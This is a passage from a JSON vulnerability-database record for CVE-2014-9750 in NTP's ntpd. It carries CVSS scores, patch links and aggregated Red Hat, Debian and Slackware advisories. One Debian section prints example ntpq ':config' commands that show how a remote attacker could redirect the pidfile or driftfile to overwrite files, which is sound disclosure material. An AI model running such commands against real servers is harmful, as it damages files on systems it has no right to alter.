"https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 4.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.8, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-9750", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-9750", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201510-026", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-9750", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-9750" }, { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "NVD", "id": "CVE-2014-9750" }, { "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntp_crypto.c in ntpd in NTP 4.x before 4.2.8p1, when Autokey Authentication is enabled, allows remote attackers to obtain sensitive information from process memory or cause a denial of service (daemon crash) via a packet containing an extension field with an invalid value for the length of its value field. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. ( Daemon crash ) There is a possibility of being put into a state. NTP is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:2231-04\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html\nIssue date: 2015-11-19\nCVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 \n CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 \n CVE-2015-3405 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix multiple security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nIt was found that because NTP\u0027s access control was based on a source IP\naddress, an attacker could bypass source IP restrictions and send\nmalicious control and configuration packets by spoofing ::1 addresses. \n(CVE-2014-9298, CVE-2014-9751)\n\nA denial of service flaw was found in the way NTP hosts that were peering\nwith each other authenticated themselves before updating their internal\nstate variables. An attacker could send packets to one peer host, which\ncould cascade to other peers, and stop the synchronization process among\nthe reached peers. (CVE-2015-1799)\n\nA flaw was found in the way the ntp-keygen utility generated MD5 symmetric\nkeys on big-endian systems. An attacker could possibly use this flaw to\nguess generated MD5 keys, which could then be used to spoof an NTP client\nor server. (CVE-2015-3405)\n\nA stack-based buffer overflow was found in the way the NTP autokey protocol\nwas implemented. (CVE-2014-9297, CVE-2014-9750)\n\nIt was found that ntpd did not check whether a Message Authentication Code\n(MAC) was present in a received packet when ntpd was configured to use\nsymmetric cryptographic keys. A man-in-the-middle attacker could use this\nflaw to send crafted packets that would be accepted by a client or a peer\nwithout the attacker knowing the symmetric key. (CVE-2015-1798)\n\nThe CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav\nLichv\u00e1r of Red Hat. \n\nBug fixes:\n\n* The ntpd service truncated symmetric keys specified in the key file to 20\nbytes. As a consequence, it was impossible to configure NTP authentication\nto work with peers that use longer keys. With this update, the maximum key\nlength has been changed to 32 bytes. (BZ#1191111)\n\n* The ntpd service could previously join multicast groups only when\nstarting, which caused problems if ntpd was started during system boot\nbefore network was configured. With this update, ntpd attempts to join\nmulticast groups every time network configuration is changed. (BZ#1207014)\n\n* Previously, the ntp-keygen utility used the exponent of 3 when generating\nRSA keys. Consequently, generating RSA keys failed when FIPS mode was\nenabled. With this update, ntp-keygen has been modified to use the exponent\nof 65537, and generating keys in FIPS mode now works as expected. \n(BZ#1191116)\n\n* The ntpd service dropped incoming NTP packets if their source port was\nlower than 123 (the NTP port). With this update, ntpd no longer checks the\nsource port number, and clients behind NAT are now able to correctly\nsynchronize with the server. (BZ#1171640)\n\nEnhancements:\n\n* This update adds support for configurable Differentiated Services Code\nPoints (DSCP) in NTP packets, simplifying configuration in large networks\nwhere different NTP implementations or versions are using different DSCP\nvalues. (BZ#1202828)\n\n* This update adds the ability to configure separate clock stepping\nthresholds for each direction (backward and forward). Use the \"stepback\"\nand \"stepfwd\" options to configure each threshold. (BZ#1193154)\n\n* Support for nanosecond resolution has been added to the Structural\nHealth Monitoring (SHM) reference clock. Prior to this update, when a\nPrecision Time Protocol (PTP) hardware clock was used as a time source to\nsynchronize the system clock, the accuracy of the synchronization was\nlimited due to the microsecond resolution of the SHM protocol. The\nnanosecond extension in the SHM protocol now allows sub-microsecond\nsynchronization of the system clock. (BZ#1117702)\n\nAll ntp users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1117702 - SHM refclock doesn\u0027t support nanosecond resolution\n1122012 - SHM refclock allows only two units with owner-only access\n1171640 - NTP drops requests when sourceport is below 123\n1180721 - ntp: mreadvar command crash in ntpq\n1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1\n1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated\n1191108 - ntpd should warn when monitoring facility can\u0027t be disabled due to restrict configuration\n1191122 - ntpd -x steps clock on leap second\n1193154 - permit differential fwd/back threshold for step vs. slew [PATCH]\n1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto\n1199435 - CVE-2015-1799 ntp: authentication doesn\u0027t protect symmetric associations against DoS attacks\n1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\naarch64:\nntp-4.2.6p5-22.el7.aarch64.rpm\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nntpdate-4.2.6p5-22.el7.aarch64.rpm\n\nppc64:\nntp-4.2.6p5-22.el7.ppc64.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nntpdate-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-22.el7.ppc64le.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nntpdate-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-22.el7.s390x.rpm\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nntpdate-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nsntp-4.2.6p5-22.el7.aarch64.rpm\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nsntp-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nsntp-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nsntp-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9297\nhttps://access.redhat.com/security/cve/CVE-2014-9298\nhttps://access.redhat.com/security/cve/CVE-2014-9750\nhttps://access.redhat.com/security/cve/CVE-2014-9751\nhttps://access.redhat.com/security/cve/CVE-2015-1798\nhttps://access.redhat.com/security/cve/CVE-2015-1799\nhttps://access.redhat.com/security/cve/CVE-2015-3405\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3\n1hLTu5I/PUzWOnD8rRIlZQ==\n=sWdG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted\n package to cause ntpd to crash if:\n\n * ntpd enabled remote configuration\n * The attacker had the knowledge of the configuration password\n * The attacker had access to a computer entrusted to perform remote\n configuration\n\n Note that remote configuration is disabled by default in NTP. \n\nCVE-2015-5194\n\n It was found that ntpd could crash due to an uninitialized\n variable when processing malformed logconfig configuration\n commands. \n\nCVE-2015-5195\n\n It was found that ntpd exits with a segmentation fault when a\n statistics type that was not enabled during compilation (e.g. \n timingstats) is referenced by the statistics or filegen\n configuration command\n\nCVE-2015-5219\n\n It was discovered that sntp program would hang in an infinite loop\n when a crafted NTP packet was received, related to the conversion\n of the precision value in the packet to double. \n\nCVE-2015-5300\n\n It was found that ntpd did not correctly implement the -g option:\n\n Normally, ntpd exits with a message to the system log if the offset\n exceeds the panic threshold, which is 1000 s by default. This\n option allows the time to be set to any value without restriction;\n however, this can happen only once. If the threshold is exceeded\n after that, ntpd will exit with a message to the system log. This\n option can be used with the -q and -x options. \n\n ntpd could actually step the clock multiple times by more than the\n panic threshold if its clock discipline doesn\u0027t have enough time to\n reach the sync state and stay there for at least one update. If a\n man-in-the-middle attacker can control the NTP traffic since ntpd\n was started (or maybe up to 15-30 minutes after that), they can\n prevent the client from reaching the sync state and force it to step\n its clock by any amount any number of times, which can be used by\n attackers to expire certificates, etc. \n\n This is contrary to what the documentation says. Normally, the\n assumption is that an MITM attacker can step the clock more than the\n panic threshold only once when ntpd starts and to make a larger\n adjustment the attacker has to divide it into multiple smaller\n steps, each taking 15 minutes, which is slow. \n\nCVE-2015-7691, CVE-2015-7692, CVE-2015-7702\n\n It was found that the fix for CVE-2014-9750 was incomplete: three\n issues were found in the value length checks in ntp_crypto.c, where\n a packet with particular autokey operations that contained malicious\n data was not always being completely validated. Receipt of these\n packets can cause ntpd to crash. \n\nCVE-2015-7701\n\n A memory leak flaw was found in ntpd\u0027s CRYPTO_ASSOC. \n\nCVE-2015-7703\n\n Miroslav Lichvar of Red Hat found that the :config command can be\n used to set the pidfile and driftfile paths without any\n restrictions. A remote attacker could use this flaw to overwrite a\n file on the file system with a file containing the pid of the ntpd\n process (immediately) or the current estimated drift of the system\n clock (in hourly intervals). For example:\n\n ntpq -c \u0027:config pidfile /tmp/ntp.pid\u0027\n ntpq -c \u0027:config driftfile /tmp/ntp.drift\u0027\n\n In Debian ntpd is configured to drop root privileges, which limits\n the impact of this issue. \n\nCVE-2015-7704\n\n If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet\n from the server to reduce its polling rate, it doesn\u0027t check if the\n originate timestamp in the reply matches the transmit timestamp from\n its request. An off-path attacker can send a crafted KoD packet to\n the client, which will increase the client\u0027s polling interval to a\n large value and effectively disable synchronization with the server. \n\nCVE-2015-7850\n\n An exploitable denial of service vulnerability exists in the remote\n configuration functionality of the Network Time Protocol. A\n specially crafted configuration file could cause an endless loop\n resulting in a denial of service. An attacker could provide a the\n malicious configuration file to trigger this vulnerability. \n\nCVE-2015-7852\n\n A potential off by one vulnerability exists in the cookedprint\n functionality of ntpq. A specially crafted buffer could cause a\n buffer overflow potentially resulting in null byte being written out\n of bounds. \n\nCVE-2015-7855\n\n It was found that NTP\u0027s decodenetnum() would abort with an assertion\n failure when processing a mode 6 or mode 7 packet containing an\n unusually long data value where a network address was expected. This\n could allow an authenticated attacker to crash ntpd. \n\nCVE-2015-7871\n\n An error handling logic error exists within ntpd that manifests due\n to improper error condition handling associated with certain\n crypto-NAK packets. An unauthenticated, off-path attacker can force\n ntpd processes on targeted servers to peer with time sources of the\n attacker\u0027s choosing by transmitting symmetric active crypto-NAK\n packets to ntpd. This attack bypasses the authentication typically\n required to establish a peer association and allows an attacker to\n make arbitrary changes to system time. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:4.2.6.p5+dfsg-2+deb7u6. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p4+dfsg-3. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p4+dfsg-3. \n\nWe recommend that you upgrade your ntp packages. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. \n In addition to bug fixes and enhancements, this release fixes\n several low and medium severity vulnerabilities. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ne0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ndb0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz\n\nSlackware x86_64 -current package:\n8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", "sources": [ { "db": "NVD", "id": "CVE-2014-9750" }, { "db": "CERT/CC", "id": "VU#852879" }, { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "BID", "id": "72583" }, { "db": "VULMON", "id": "CVE-2014-9750" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#852879", "trust": 3.6 }, { "db": "NVD", "id": "CVE-2014-9750", "trust": 3.1 }, { "db": "BID", "id": "72583", "trust": 2.0 }, { "db": "ICS CERT", "id": "ICSA-14-353-01", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU96605606", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-008138", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201510-026", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10663", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-9750", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134448", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134162", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134137", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9750" }, { "db": "BID", "id": "72583" }, { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "NVD", "id": "CVE-2014-9750" }, { "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "id": "VAR-201510-0705", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.42526317 }, "last_update_date": "2023-12-18T10:57:29.511000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NV15-009", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-009.html" }, { "title": "Bug 2671", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2671" }, { "title": "Security Notice", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#december_2014_ntp_security_vulne" }, { "title": "Bug 1184573", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1184573" }, { "title": "RHSA-2015:1459", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-1459.html" }, { "title": "NTP ntpd Enter the fix for the verification vulnerability", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=57884" }, { "title": "Red Hat: Moderate: ntp security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152231 - security advisory" }, { "title": "Debian Security Advisories: DSA-3154-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=79bca69a97f389f5ace450cd721cf945" }, { "title": "Red Hat: CVE-2014-9750", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-9750" }, { "title": "Red Hat: Moderate: ntp security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162583 - security advisory" }, { "title": "Debian Security Advisories: DSA-3388-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=61fe4252a877d02aaea1c931efa0a305" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-9750" }, { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "NVD", "id": "CVE-2014-9750" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "http://www.kb.cert.org/vuls/id/852879" }, { "trust": 2.0, "url": "http://bugs.ntp.org/show_bug.cgi?id=2671" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/72583" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1184573" }, { "trust": 1.7, "url": "http://support.ntp.org/bin/view/main/securitynotice#december_2014_ntp_security_vulne" }, { "trust": 1.7, "url": "http://www.debian.org/security/2015/dsa-3388" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2015-1459.html" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03886en_us" }, { "trust": 1.6, "url": "http://lists.ntp.org/pipermail/announce/2014-december/000122.html" }, { "trust": 0.9, "url": 